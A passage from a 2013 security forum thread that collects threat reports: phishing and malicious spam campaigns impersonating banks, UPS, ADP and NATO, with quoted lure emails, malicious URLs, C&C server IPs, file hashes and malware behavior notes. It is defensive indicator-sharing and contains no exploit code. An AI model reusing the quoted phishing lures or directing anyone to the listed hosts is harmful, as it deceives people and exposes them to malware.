108.5.125.134
198.50.169.2
198.61.147.58
209.59.223.119 ..."
* http://urlquery.net/report.php?id=2504632
Also at: http://threattrack.tumblr.com/post/50671403152/malicious-newegg-order-spam
May 17, 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4122a83db45982e54ded798906a63447/tumblr_inline_mmyl9yAwpg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Product Order Quotation Attachment E-mail Messages - 2013 May 17
Fake Product Order E-mail Messages - 2013 May 17
Fake Purchase Order E-mail Messages - 2013 May 17
Fake Account Compromise Notification E-mail Messages - 2013 May 17
Fake Scanned Document Attachment E-mail Messages - 2013 May 17
Fake Social Media User Notification E-mail Messages - 2013 May 17
Fake Facebook Security Software E-mail Messages - 2013 May 17
Fake Incoming Fax Message E-mail Messages - 2013 May 17
Fake Document Sharing E-mail Messages - 2013 May 17
Fake Italian Shared Document E-mail Messages - 2013 May 17
Fake Invoice Statement Attachment E-mail Messages - 2013 May 17
Fake Money Transfer Notification E-mail Messages - 2013 May 17
Fake Xerox Scan Attachment E-mail Messages - 2013 May 17
(More detail and links at the cisco URL above.)
:mad:
AplusWebMaster
2013-05-20, 14:35
FYI...
Something evil on 50.116.28.24
- http://blog.dynamoo.com/2013/05/something-evil-on-501162824.html
19 May 2013 - "50.116.28.24 (Linode, US) is hosting the callback servers for some Mac malware as mentioned here* and here** plus some other suspect sites. I would advise that you assume that -all- domains hosted on this IP are malicious..."
(More detail at the dynamoo URL above.)
* http://www.f-secure.com/weblog/archives/00002554.html
** http://forums.macrumors.com/showthread.php?t=1583233
___
Wells Fargo Credentials Phish
- http://threattrack.tumblr.com/post/50913877787/wells-fargo-credentials-phish
20 May 2013 - "Subjects Seen:
Account Update
Typical e-mail details:
In order to safeguard your account, we require that you confirm your details.
To help speed up this process, please access the following link so we can complete the verification of your Wells Fargo information details.
To get started, visit the link below:
Wells Fargo Online Confirmation
Malicious URLs
update.id5027-wellsfargo .com/index.php?id=586616
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b0d8988c075155635a6682da8f92e4a0/tumblr_inline_mn3umbkVzo1qz4rgp.png
___
Malicious Invoice Attachment Spam
- http://threattrack.tumblr.com/post/50914381181/malicious-invoice-attachment-spam
20 May 2013 - "Subjects Seen:
invoice copy
Typical e-mail details:
Kindly open to see export License and payment invoice attached,
meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if
there is any problem.
Thanks
Karen parker
Spam contains malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/cbdf76f6219dbb3755e51a541a68aad0/tumblr_inline_mn3v14O1qo1qz4rgp.png
___
Chase Bank Credentials Phish
- http://threattrack.tumblr.com/post/50929274377/chase-bank-credentials-phish
20 May 2013 - "Subjects Seen:
Billing Code:[removed]
Typical e-mail details:
During regularly scheduled account maintenance and verification procedures, we have detected a slight error in your billing information.
This might be due to either of the following reasons:
1. A recent change in your personal information ( i.e. change of address).
2. Submitting invalid information during the initial sign up process.
3. An inability to accurately verify your selected option of payment due to an internal error within our processors.
Click on the guide-link below and follow the directions or please call our Online Helpdesk.
Regards,
Chase Online
Billing Department
Thanks for your co-operation.
Malicious URLs
goodnickfitness .com.au/hnav.html
diamondtek .cl/diamondtek .cl/http/online.chaseonline1/com/logon.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/04079d40aed3b5bc8b4adb60986fe381/tumblr_inline_mn45ob1itt1qz4rgp.png
___
Blackhole Spam Run evades detection using Punycode
- http://blog.trendmicro.com/trendlabs-security-intelligence/blackhole-spam-run-evades-detection-using-punycode/
May 20, 2013 - "... we have seen a slew of spam crafted as a notice from the popular retail chain Walmart. However, this spam run offers something different.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/BHEK-walmart.jpg
... some of the URLs lead to Cyrillic domain names. These domains were translated into the English alphabet through punycode. Punycode* is a way to convert Unicode characters into a smaller character set. URLs in punycode have to be decoded first in order to see its original format. The use of international domain names (IDNs) can pose additional security risks to users. Users can be redirected to a phishing page that appears to have the same URL as a legitimate site. IDNs also allow spammers to create more spam domains not limited to English characters. This can make blocking malicious sites more difficult. This technique is not new, but seeing punycode used in a BHEK email campaign is unusual. Users who click the links are redirected to several sites, until they are lead to the site hosting a malware (detected as TROJ_PIDIEF.SMXY), which exploits a in Adobe Reader and Acrobat (CVE-2009-0924) to download and execute other malware onto the vulnerable system. This attempt at evading detection is not surprising, given how 2013 is shaping up to be the year of refining existing tools. In our 1Q 2013 Security Roundup, we already noticed how dated threats like Asprox and banking Trojans like CARBERP were returning to the scene with new and improved features. We can expect this trend to continue this year, though new threats can always appear anytime soon..."
* http://www.ietf.org/rfc/rfc3492.txt
:mad: :fear: :fear:
AplusWebMaster
2013-05-21, 15:30
FYI...
Fake NATO jobs SPAM ...
- http://blog.webroot.com/2013/05/21/cvs-and-sensitive-info-soliciting-email-campaign-impersonates-nato/
May 21, 2013 - "Want to join the North Atlantic Treaty Organization (NATO)?... you’d be involuntarily sharing your information with what looks like an intelligence gathering operation...
Sample screenshot of the -fake- NATO Employment Application Form:
> https://webrootblog.files.wordpress.com/2013/05/fake_nato_employment_application.png
A copy of the -fake- NATO Employment Application Form
> http://webrootblog.files.wordpress.com/2013/05/nato-employment-application-form.pdf
A copy of the -fake- NATO Interview Form
> http://webrootblog.files.wordpress.com/2013/05/nato-interview-form.pdf
... NATO impersonating domain name reconnaissance:
nspa-nato.int.tf – 188.40.117.12; 188.40.70.27; 188.40.70.29
Name server: ns1.idnscan .net
Name server: ns2.idnscan .net
usnato-hr.org – 208.91.198.24
Name Server: DNS1.SPIRITDOMAINS .COM
Name Server: DNS2.SPIRITDOMAINS .COM
... We know that on 2013-05-10 07:01:46 CET, responding to the same IP (188.40.117.12) was also the following Black Hole Exploit Kit redirecting URLs...
Always watch where you apply and be aware of offers which sound too good to be true."
(More detail at the webroot URL above.)
___
Fake Delivery_Information_ID-000512430489234.zip
- http://blog.dynamoo.com/2013/05/deliveryinformationid-000512430489234zip.html
21 May 2013 - "The file Delivery_Information_ID-000512430489234.zip is being promoted by a spam run (perhaps aimed at Italian users, although all the hosts are German)... best guess is that it is a fake package delivery report. So far I have identified three download locations for the malicious ZIP file:
[donotclick]www.interapptive .de/get/Delivery_Information_ID-000512453420234.zip
[donotclick]www.vankallen .de/get/Delivery_Information_ID-000512453420234.zip
[donotclick]www.haarfashion .de/get/Delivery_Information_ID-000512430489234.zip
The ZIP file decompresses to Delivery_Information_ID-000512453420234.Pdf_______________________________________________________________.exe (note all those underscores!) which has a VirusTotal detection rate of 23/47* and has the following checksums:
MD5: 791a8d50acfea465868dfe89cdadc1fc
SHA1: be67a7598c32caf3ccea0d6598ce54c361f86b0a
SHA256: 9ae8fe5ea3b46fe9467812cbb2612c995c21a351b44b08f155252a51b81095d7
The Anubis report is pretty inconclusive but ThreatTrack reports** [pdf] some peer-to-peer traffic and also some rummaging around the Window Address Book (WAB)."
* https://www.virustotal.com/en/file/9ae8fe5ea3b46fe9467812cbb2612c995c21a351b44b08f155252a51b81095d7/analysis/1369127051/
File name: Delivery_Information_ID-000512453420234.Pdf______________________...
Detection ratio: 23/47
Analysis date: 2013-05-21
** http://www.dynamoo.com/files/analysis_30721_791a8d50acfea465868dfe89cdadc1fc.pdf
___
Malicious eFax Corporate Spam
- http://threattrack.tumblr.com/post/50992552536/malicious-efax-corporate-spam
21 May 2013 - "Subjects Seen:
Corporate eFax message from [removed]
Typical e-mail details:
You have received a 3 fax at 2013-05-07 10:24:18 CST.
* The reference number for this fax is [removed].
Please visit efaxcorporate.com/corp/twa/page/customerSupport if you have any questions regarding this message or your service. You may also e-mail our corporate support department at corporatesupport @mail.efax.com.
Thank you for using the eFax Corporate service!
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
debthelpsmart .org/ponyb/gate.php
debtsmartretirement .com/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/04b210cbaad377d10a19ce26b5dfe3a7/tumblr_inline_mn5mcsC2PH1qz4rgp.png
___
prospectdirect .org SPAM
- http://blog.dynamoo.com/2013/05/prospectdirectorg-spam.html
21 May 2013 - "Everything that this spammer says is a lie:
From: Emily Norton [emily.norton @prospectdirect .org]
To: [redacted]
Date: 21 May 2013 16:33
Subject: Cater to your email marketing needs
Signed by: prospectdirect .org
Hello,
I hope you don’t mind but I just wanted to contact you to discuss your email marketing strategy. If you don’t currently have one that is working for you then our client can help.
The company I am contacting you on behalf of have the dedicated knowledge and services to cater to your email marketing needs.
If you would like a quote please complete this form: http ://prospectdirect .org/email-marketing-strategy
Leave your details at the link above or reply with any requirements.
Kind Regards,
Emily Norton
75 Glandovey Terrace, Newquay, Cornwall TR8 4QD
Tel: 0843 289 4698
This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidential or privileged information and should not be read, copied or otherwise used by any other person. If you are not the named recipient please contact the sender and delete the email from your system. If you would no longer like to receive emails from us please unsubscribe here http ://www.prospectdirect .org/landing/page.php?jq=[snip]
Firstly, the email was sent to a scraped address from the website of the Slimeware Corporation and isn't any sort of opted-in address at all. The address of "75 Glandovey Terrace, Newquay, Cornwall TR8 4QD" simply does -not- exist, and the telephone number of 0843 289 4698 appears to belong to a completely -unrelated- company. I very much doubt there is anybody called "Emily Norton" involved, and there is no company in the UK with the name "Prospect Direct". The website prospectdirect .org itself carefully hides any contact details, the WHOIS details are anonymous, the domain was created on 2012-07-19 and is hosted on 109.235.51.98 (Netrouting / Xeneurope , Netherlands). There are no contact details on the website and there is no identifying information at all.. it hasn't just been omitted by accident, the whole thing has been left meticulously clean by a professional spamming outfit.
> https://lh3.ggpht.com/-t6eWqUjKl84/UZvEKHeSs4I/AAAAAAAABOo/XRPXQOIt8rg/s400/prospect-direct.png
I would recommend giving these spammers a wide berth given their catalogue of lies."
:mad: :mad:
AplusWebMaster
2013-05-22, 20:03
FYI...
Malicious ADP Spam
- http://threattrack.tumblr.com/post/51071699249/malicious-adp-invoice-spam
22 May 2013 - "Subjects Seen:
Invoice #[removed] - Remit file
Typical e-mail details:
Attached is the invoice (ADP_Invoice_[removed].zip) received from your bank.
Please print this label and fill in the requested information. Once you have filled out
all the information on the form please send it to payroll.invoices @adp .com.
For more details please see the attached file.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you ,
Automatic Data Processing, Inc...
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
mail.yaklasim .com:8080/ponyb/gate.php
10healthynails .com/ponyb/gate.php
advprintgraphics .com/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Malicious File Name and MD5:
ADP_Invoice_[removed].zip (638d32dc80678f17609fe21dF73c6f6d)
ADP_Invoice_[removed].exe (a8aab9bcd389348823b77b090fb0afcc)
uszyly.vxe (707423e64a6ab41d694a9e1d8e823d292)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d2634805a2675263f58d6f2fdf754515/tumblr_inline_mn7fuoyMJg1qz4rgp.png
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Purchase Order E-mail Messages - 2013 May 22
Fake Xerox Scan Attachment E-mail Messages - 2013 May 22
Fake Product Order Quote Request E-mail Messages - 2013 May 22
Fake Document Sharing E-mail Messages - 2013 May 22
Fake Facebook Voice Comment E-mail Message - 2013 May 22
Fake DHL Order Tracking Notification E-mail Messages - 2013 May 22
Fake Product Order Quote Request E-mail Messages - 2013 May 22
Fake Check Return Notification E-mail Messages - 2013 May 22
Fake Picture Link E-mail Messages - 2013 May 22
Fake Money Transfer Notification E-mail Messages - 2013 May 22
Fake Invoice Statement Attachment E-mail Messages - 2013 May 22
Fake Product Order E-mail Messages - 2013 May 22
Fake Holiday Photo Sharing Request E-mail Messages - 2013 May 22
Fake Scanned Document Attachment E-mail Messages - 2013 May 22
Fake Payment Request Notification E-mail Messages - 2013 May 22
(More detail and links at the cisco URL above.)
:fear: :mad:
AplusWebMaster
2013-05-23, 13:54
FYI...
Spear-phish e-mails lead to APT
- https://atlas.arbor.net/briefs/index#-1950400672
Elevated Severity
May 22, 2013
Yet another targeted attack is dissected. Password theft was one of the motivating factors in the campaign.
Analysis: Well-crafted spear-phish e-mails were sent to the victim organizations. These spear phish included exploit code for patched vulnerabilities in Microsoft Office and also delivered bait files of interest to the target. In some cases, the bait files contain exploit code and in other cases they merely serve as a distraction. This is a tried-and-true method in wide use by cybercriminals and nation-state espionage actors. Once the malware is installed, credential theft applications can be used. The document provided by trend includes various Indicators of Compromise (IOCs) that organizations can use to help detect if they have been or are currently a victim. Additionally, domains used for malicious purposes are sometimes re-used at a later time, so keeping an eye on DNS logs and HTTP activity can help spot a new campaign re-using older infrastructure.
Source: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf
- http://blog.trendmicro.com/trendlabs-security-intelligence/hiding-in-plain-sight-a-new-apt-campaign/
"... The distribution method of this campaign involves spear-phishing emails that contain a malicious attachment exploiting a Microsoft Office vulnerability (CVE-2012-0158*)..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH) - MS12-027
- https://www.net-security.org/malware_news.php?id=2500
May 20, 2013 - "... Dubbed "Safe," the campaign has first been spotted in October 2012 and has so far resulted in nearly 12,000 unique IP addresses spread over more than 100 countries to be connected to two sets of command-and-control (C&C) infrastructures..."
___
Fake ‘Export License/Payment Invoice’ emails lead to malware
- http://blog.webroot.com/2013/05/23/fake-export-licensepayment-invoice-themed-emails-lead-to-malware/
May 23, 2013 - "... just intercepted yet another currently ongoing malicious spam campaign, enticing users into executing a fake Export License/Payment Invoice. Once gullible and socially engineering users do so, their PCs automatically join the botnet operated by the cybercriminals. More details:
Detection rate for the malicious executable: MD5: 4e7dc191117a6f30dd429cc619041552 * ... Trojan.Win32.Inject.foiq; Trojan.Zbot.
Once executed, the sample starts listening on port 28723...
It then phones back to the following C&C servers:
213.230.101.174 :11137
87.203.65.0 :12721
180.241.97.79 :16114
83.7.104.50 :13647
84.59.222.81 :10378
194.94.127.98 :25549
98.201.143.22 :19595
78.139.187.6 :14384
180.183.178.134 :20898
We’ve also seen the following C&C server IP (194.94.127.98) in previously profiled malicious campaigns... As well as 78.139.187.6 ... We’re aware of more MD5s that phoned back to the same IPs over the last couple of days..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/de224cd737587233cfbec4a648de36dba5f620bd44c9f35a7577a82373e202dc/analysis/1369151297/
File name: invoice copy.exe
Detection ratio: 33/47
Analysis date: 2013-05-21
___
Fake FBI Ransomware - spikes...
- http://blog.webroot.com/2013/05/23/recent-spike-in-fbi-ransomware-striking-worldwide/
May 23, 2013 - "Recently we have seen a spike of this ransomware in the wild as it appears as though its creators are not easily giving up. This infection takes your computer hostage and makes it look as though the authorities are after you, when in reality this is all just an elaborate attempt to make you -pay- to unblock your computer. Once infected, a warning similar to the one below* will take up your entire screen in such a way that you can’t get around it, thus effectively blocking you from accessing your files, programs or anything else on your computer. To further scare you into believing that you’ve been caught in illegal activity, your IP address, rough location, internet service provider, operating system and webcam image may be displayed.
* https://webrootblog.files.wordpress.com/2013/05/fbicyberdiv.png?w=869
To ensure maximum profits, the malware writers made sure that everyone understood their warning and payment instructions by localizing the infection around the world... there are variants of this infection that will encrypt your files so even after the infection is removed, documents, pictures and many other files on the hard drive will be inaccessible. Once the files are encrypted it can be very difficult or impossible to restore the original unencrypted versions. To avoid data loss, we strongly suggest periodically backing up your data...The infection executable may be located in the AppData, Temp, or User Profile directories and typically loads by adding itself to the Run keys or by modifying the Winlogon Shell entry. In some cases it may load using only a shortcut that’s placed in the Startup folder..."
:mad::fear::fear:
AplusWebMaster
2013-05-24, 17:48
FYI...
Malicious UPS Spam
- http://threattrack.tumblr.com/post/51223546153/malicious-ups-spam
24 May 2013 - "Subjects Seen:
UPS - Your package is available for pickup ( Parcel [removed] )
Typical e-mail details:
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
Malicious URLs
116.122.158.195 :8080/ponyb/gate.php
50.63.222.182 /GGBG2H.exe
Malicious File Name and MD5:
UPS_Label_[removed].zip (667cf9590337d47f8c23053a8b2480a1)
UPS_Label_[removed].exe (1ef1438e2f2273ddbaf543dcdbaea5b1)
73036718.exe (c7e0c3d8b14e8755d32e27051d0e6477)
ThreatAnalyzer Report: http://db.tt/gTlNJnGy
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/990950926ca5cbe1ceabe7576d46d4da/tumblr_inline_mnb1xneaHb1qz4rgp.png
___
Bank of America Credentials Phish
- http://threattrack.tumblr.com/post/51224876478/bank-of-america-credentials-phish
24 May 2013 - "Subjects Seen:
Bank of America alert: Your account has been locked
Typical e-mail details:
There are a number of invalid login attempts on your account. We had to believe that, there might be some security problems on your account. So we have decided to put an extra verification process to ensure your identity and your account security.
Please click here to continue the verification process and ensure your account security.
Malicious URLs
radiojetaislame .com/images/safe5
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c41b9c753a7195c19dd10f0c546941c6/tumblr_inline_mnb3bo7cwo1qz4rgp.png
___
Fake Chase "Incoming Wire Transfer" SPAM / incoming_wire_05242013.zip
- http://blog.dynamoo.com/2013/05/chase-incoming-wire-transfer-spam.html
24 May 2013 - "This fake Chase "Incoming Wire Transfer" email has a malicious attachment...
Date: Fri, 24 May 2013 09:18:23 -0500 [10:18:23 EDT]
From: Chase [Chase @emailinfo.chase .com]
Subject: Incoming Wire Transfer
Note: This is a service message with information related to your Chase account(s)...
Screenshot: https://lh3.ggpht.com/-ofvJxQkPoeA/UZ97fjaJ3pI/AAAAAAAABPM/dVBJcBLjNbI/s1600/chase.png
The attachment incoming_wire_05242013.zip contains an executable incoming_wire_05242013.exe with a detection rate of 9/47 at VirusTotal*. The ThreatTrack report** [pdf] and ThreatExpert report*** show various characteristics of this malware, in particular a callback to the following IPs and domains:
116.122.158.195
188.93.230.115
199.168.184.197
talentos.clicken1 .com
Checksums are as follows:
MD5 f9182e5f13271cefc2695baa11926fab
SHA1 b3cff6332f2773cecb2f5037937bb89c6125ec15
SHA256 0a23cdcba850056f8425db0f8ad73dca7c39143cdafc61c901c8c3428f312f2d
* https://www.virustotal.com/en/file/0a23cdcba850056f8425db0f8ad73dca7c39143cdafc61c901c8c3428f312f2d/analysis/1369405971/
File name: incoming_wire_05242013.exe
Detection ratio: 9/47
Analysis date: 2013-05-24
** http://www.dynamoo.com/files/analysis_30795_f9182e5f13271cefc2695baa11926fab.pdf
*** http://www.threatexpert.com/report.aspx?md5=f9182e5f13271cefc2695baa11926fab
___
Compromised Indian gov't Web site leads to BlackHole Exploit Kit
- http://blog.webroot.com/2013/05/24/compromised-indian-government-web-site-leads-to-black-hole-exploit-kit/
May 24, 2013 - "Our sensors recently picked up a Web site infection, affecting the Web site of the Ministry of Micro And Medium Enterprises (MSME DI Jaipur). And although the Black Hole Exploit Kit serving URL is currently not accepting any connections, it’s known to have been used in previous client-side exploit serving campaigns...
Sample screenshot of the affected Web site:
> https://webrootblog.files.wordpress.com/2013/05/indian_government_web_site_hacked_compromised_black_hole_exploit_kit_01.png
Sample compromised URLs:
hxxp ://sisijaipur .gov.in/cluster_developement.html
hxxp ://msmedijaipur .gov.in/cluster_developement.html
Detection rate for the malicious script: MD5: 44a8c0b8d281f17b7218a0fe09840ce9 * ... Trojan:JS/BlacoleRef.W; Trojan-Downloader.JS.Iframe.czf.
Malicious domain names/redirectors reconnaissance:
888-move-stuff .com – 50.63.202.21 – Email: van2move @yahoo .com
888movestuff .com – 208.109.181.190 – Email: van2move @yahoo .com
jobbelts .com (redirector/C&C) – 98.124.198.1 – Email: aanelli @yahoo .com
More malicious domains are known to have been responding to the same IP in the past (98.124.198.1)... MD5s are also known to have phoned back to the same (redirector/C&C) IP in the past... phoning back to vnclimitedrun .in:443 (199.59.166.86). In 2012, the same IP was also seen in a malvertising campaign..."
* https://www.virustotal.com/en/file/ed159274fe4d49ec3ec48ce31fe326a3d2acb837c5ae435fbd2a9095c2adae20/analysis/1369337259/
File name: Indian.html
Detection ratio: 24/47
Analysis date: 2013-05-23
:mad: :fear:
AplusWebMaster
2013-05-28, 02:17
FYI...
Fake Citibank SPAM / Statement 57-27-05-2013.zip
- http://blog.dynamoo.com/2013/05/citibank-spam-statement-57-27-05-2013zip.html
27 May 2013 - "This fake Citibank email has a malicious attachment:
Date: Mon, 27 May 2013 23:25:06 +0530 [13:55:06 EDT]
From: Millard Hinton [leftoverss75 @gmail .com]
Subject: Merchant Statement
Enclosed (xlsx|Exel file|document|file) is your Citibank Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech.
Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech's or the Merchant's email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly...
The attachment Statement 57-27-05-2013.zip contains a malicious executable Statement 57-27-05-2013.exe with a VirusTotal result of 12/46*. The Comodo CAMAS report and Anubis report are pretty inconclusive. The ThreatTrack report** [pdf] is more comprehensive some peer-to-peer traffic and accessing of the WAB. Simseer's prognosis*** is that this is a Zbot variant. For the record, these are the checksums involved:
MD5 0bbf809dc46ed5d6c9f1774b13521e72
SHA1 9a50fa08e71711d26d86f34d8179f87757a88fa8
SHA256 00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400
* https://www.virustotal.com/en/file/00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400/analysis/1369679734/
File name: Statement 57-27-05-2013.exe
Detection ratio: 12/47
Analysis date: 2013-05-27
** http://www.dynamoo.com/files/analysis_30823_0bbf809dc46ed5d6c9f1774b13521e72.pdf
*** http://www.simseer.com/webservices/SimseerSearch/SimseerSearch-print-report.php?h=0bbf809dc46ed5d6c9f1774b13521e72
:fear::mad:
AplusWebMaster
2013-05-28, 14:58
FYI...
Something evil on 158.255.212.96 and 158.255.212.97
- http://blog.dynamoo.com/2013/05/something-bit-evil-on-15825521296-and.html
28 May 2013 - "The IPs 158.255.212.96 and 158.255.212.97 (EDIS GmbH, Austria) are hosting malware used in injection attacks (see this example* for fussball-gsv .de). These two** examples*** report a TDS URL pattern which is resistant to automated analysis. The domains appear to be part of a traffic exchanger system (never a good idea), but they have been used to distribute malware... In the cases where no malware has been reported it may well be because Google hasn't visited the site. The domains all have anonymous WHOIS details and have been registered in the past year or so... I can identify a couple more IPs in this cluster, and I would advise you to treat all the domains here as suspect and add them to your blocklist:
158.255.212.96
158.255.212.97
193.102.11.3
205.178.182.1..."
(More detail at the dynamoo URL above.)
* http://urlquery.net/report.php?id=2705726
** http://urlquery.net/report.php?id=2705607
*** http://urlquery.net/report.php?id=2515019
___
fab .com SPAM
[Via the WeAreSpammers blog]
- http://blog.dynamoo.com/2013/05/fabcom-spam.html
28 May 2013 - "I've never heard of fab .com before, but online comments are very negative*. Originating IP is 65.39.215.63 (Sailthru / Peer 1, US) spamvertising mailer.eu.fab .com on 63.251.23.249 (Insight Express LLC, US) which in turn leads to the main site of fab .com on 184.73.196.153 (Amazon .com, US). Avoid."
From: Fab
To: donotemail @wearespammers .com
Date: 27 May 2013 17:26
Subject: Invite from jenotsxx @gmail .com to Fab
Mailing list: tm.3775.3198a5cdc7466d097e36916b482cde87.sailthru .com
Signed by: eu.fab .com
* https://www.google.co.uk/search?&q=%22fab.com%22+spam
___
BANKER Malware hosted in compromised Brazilian gov't sites
- http://blog.trendmicro.com/trendlabs-security-intelligence/banker-malware-hosted-in-compromised-brazilian-government-sites/
28 May 2013 - "Two Brazilian government websites have been compromised and used to serve malware since April 24. We spotted a total of 11 unique malware files being distributed from these sites, with filenames that usually include “update”, “upgrade”, “Adobe”, “FlashPlayer” or combinations thereof. Besides the different filenames, these samples also have different domains where they can connect to download other malicious files, as well as varying command-and-control (C&C) servers... 90% of the affected customers are from Brazil. Other affected countries include the United States and Angola.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/05/BANKER_malware_percountry.jpg
The general behavior of these malicious files (detected as TROJ_BANDROP.ZIP) are similar. They drop two files: one executable file (detected as TSPY_BANKER.ZIP) and a supposed GIF file (detected as JAVA_BANKER.ZIP) file in the system’s temporary folder. The executable file modifies the Windows registry to lower system’s security settings, and ultimately loads the .GIF file. The “GIF file” is actually a Java file, loaded using the javaw.exe executable, which is part of the Java Runtime Environemnt. JAVA_BANKER.ZIP contains commands that can download and execute files from several pre-configured URLs. The downloaded files are then saved as %User Profile%\update.gif (also detected as JAVA_BANKER.ZIP) and executed. These JAR files use several open source libraries such as Java Secure Channel (JSch) and Java Native Access (JNA). These libraries and can be used for network operations, in particular connecting to an SSH server, port forwarding, file transfers among others. The final payload of JAVA_BANKER.ZIP is a .JAR file, which elevates the affected user’s administrator right. Given that the attacker has taken control of the system, modifying the victim’s admin rights enables him to modify the normal system file termsvr.dll. This .DLL is mainly used for remote desktop sessions. The malware will replace this file with %Temp%\update.gif... Compromising and [i]using government sites to deliver malware is not an unusual practice. Earlier this month, a website of the US Department of Labor was compromised to serve zero-day Internet Explorer exploit. This tactic provides a certain social engineering leverage, as government-related sites are usually deemed safe and secure. But as this incident clearly shows, there is no sacred cow when it comes to cybercrime. Everyone is fair game..."
:mad: :fear:
AplusWebMaster
2013-05-29, 15:02
FYI...
Ruby on Rails attack installs bot ...
- http://h-online.com/-1872588
29 May 2013 - "Over the past few days, criminals have increasingly attempted to compromise servers via a security hole in the Ruby on Rails (RoR) web application framework. Successful intruders install a bot that waits for further instructions on an IRC channel. On his blog*, security expert Jeff Jarmoc reports that the criminals are trying to exploit one of the vulnerabilities described by CVE-2013-0156**. Although the holes were closed back in January, more than enough servers on the net are probably still running an obsolete version of Ruby... The bot appears in the process list as "– bash". When launched, it also creates a file called /tmp/tan.pid to ensure that only one instance of the bot will be executed. Those who run a server with Ruby on Rails should always make sure to have the current RoR version installed. The current versions of Ruby on Rails are 3.2.13, 3.1.12 and 2.3.18."
* http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/
"... Exploit activity is reportedly sourcing from * 88.198.20.247 * 95.138.186.181 * 188.190.126.105..."
** https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0156 - 7.5 (HIGH)
*** http://rubyonrails.org/download
- http://weblog.rubyonrails.org/releases/
- http://atlas.arbor.net/briefs/index#-789014484
Elevated Severity
May 30, 2013 - "... Monitoring for outbound connections to IRC ports on cvv4you .ru, 188.190.124.120, 188.190.124.81 is recommended to find compromised systems that may still be at risk..."
___
Fake Citibank emails serve malware ...
- http://blog.webroot.com/2013/05/29/cybercriminals-resume-spamvertising-citibank-merchant-billing-statement-themed-emails-serve-malware/
May 29, 2013 - "Over the past week, the cybercriminals behind the recently profiled ‘Citibank Merchant Billing Statement‘ themed campaign, resumed operations, and launched yet another massive spam campaign impersonating Citibank, in an attempt to trick its customers into executing the malicious attachment found in the fake emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/fake_email_spam_citibank_merchant_billing_statement_malware.png
Detection rate for the malicious executable – MD5: 0bbf809dc46ed5d6c9f1774b13521e72 * ... Trojan-Spy.Win32.Zbot.lvpo.
Once executed, the sample starts listening on port 12674. It then drops the following MD5s on the affected hosts:
MD5: 6044cc337b5dbf82f8746251a13f0bb2
MD5: d20d915dbdcb0cca634810744b668c70
MD5: 758498d6b275e58e3c83494ad6080ac2 ...
It then phones back to the following C&C servers:
78.161.154.194 :25633
186.29.77.250 :18647
190.37.115.43 :29609
187.131.8.1 :13957
181.67.50.91 :27916
8.161.154.194
186.29.77.250
190.37.115.43
187.131.8.1
181.67.50.91
84.59.222.81
211.209.241.213
108.215.44.142
122.163.41.96
99.231.187.238
89.122.155.200
79.31.232.136
142.136.161.103
63.85.81.254
98.201.143.22
110.164.140.144
195.169.125.228
190.83.222.173
96.29.242.234
178.251.75.50
199.21.164.167
180.92.159.2
213.43.242.145
94.240.224.115
2.187.51.145
208.101.114.115
50.97.98.134
41.99.119.243
197.187.33.59
79.106.11.64
178.89.68.255
190.62.162.200
165.98.119.94
94.94.211.18 ..."
(More details at the webroot URL above.)
* https://www.virustotal.com/en/file/00b832b5128a7caffe8bd4a854b1e112d488acb37f3a787245d077ae0d106400/analysis/
File name: Statement 57-27-05-2013.exe
Detection ratio: 32/47
Analysis date: 2013-05-29
___
University of Illinois CS department compromised
- http://blog.dynamoo.com/2013/05/university-of-illinois-cs-department.html
29 May 2013 - "There's a bunch of malware sites infesting University of Illinois CS department machines in the 128.174.240.0/24, range, mostly pointed out in this post. Compromised machines are tarrazu.cs.uiuc .edu, croft.cs.illinois .edu, tsvi-pc.cs.uiuc .edu, mirco.cs.uiuc .edu, ytu-laptop.cs.uiuc .edu, node3-3105.cs.uiuc .edu and they are on the following IPs with the following malicious domains (I would recommend blocking the whole /24):
128.174.240.37 ...
128.174.240.52 ...
128.174.240.53 ...
128.174.240.74 ...
128.174.240.153 ...
128.174.240.213 ..."
(More domains listed at the dynamoo URL above.)
Update: the University says that this was a single machine on the network which has now been cleaned up.
___
Malware sites to block 29/5/13
